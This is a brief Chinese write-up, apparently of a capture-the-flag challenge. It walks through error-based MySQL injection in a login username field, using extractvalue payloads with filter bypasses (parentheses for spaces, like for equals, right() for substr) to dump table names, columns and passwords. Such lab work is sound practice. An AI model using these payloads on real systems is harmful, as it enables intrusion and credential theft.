直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 #
有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替
username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())))))%23查表名
username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)))))%23发现只出一半,substr被禁用了 这里可以用right()
username=admin'or(extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)))))%23